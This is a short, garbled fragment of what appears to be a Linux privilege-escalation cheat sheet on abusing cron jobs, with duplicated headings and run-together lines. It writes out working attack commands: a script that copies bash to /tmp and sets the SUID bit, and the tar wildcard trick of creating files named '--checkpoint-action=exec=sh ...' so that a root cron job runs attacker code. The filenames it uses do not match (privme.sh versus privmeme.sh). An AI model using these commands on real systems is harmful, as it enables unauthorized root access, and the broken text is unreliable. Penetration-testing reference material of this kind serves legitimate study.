Cron jobs
cat /etc/crontabCron Paths
Cron Wildcards
Cron File Overwrites
Last updated
cat /etc/crontabLast updated
systemctl list-timers --allecho 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > privme.sh
touch -- "--checkpoint=1"
touch -- "--checkpoint-action=exec=sh privmeme.sh"